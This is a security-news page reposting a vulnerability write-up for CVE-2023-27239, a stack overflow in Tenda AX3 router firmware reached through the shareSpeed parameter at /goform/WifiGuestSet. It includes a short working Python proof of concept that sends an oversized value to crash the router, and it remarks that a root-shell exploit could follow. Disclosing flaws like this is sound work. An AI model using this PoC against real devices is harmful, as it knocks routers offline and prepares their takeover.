Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-27239: CVE/readme.md at main · yjzy00001/CVE

Tenda AX3 V16.03.12.11 was discovered to contain a stack overflow via the shareSpeed parameter at /goform/WifiGuestSet.

CVE
Open in Source
#vulnerability#wifi

Permalink

Tenda AX3 V16.03.12.11 Stack overflow vulnerability****Firmware information

  • Manufacturer’s address:https://www.tenda.com.cn/

  • Firmware download address : https://www.tenda.com.cn/download/detail-3476.html

Affected version

Vulnerability details

In /goform/WifiGuestSet,The user passes in shareSpeed, and then the program will use strcpy to copy shareSpeed to shared_up_speed. It is worth noting that there is no size check, which leads to stack overflow vulnerabilities.

Poc

import requests

url = “http://192.168.0.1/goform/WifiGuestSet”

shareSpeed = “a” * 0x2000

r = requests.post(url, data={’shareSpeed’: shareSpeed}) print(r.content)

You can see the router crash, and finally you can write exp to get root shell

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE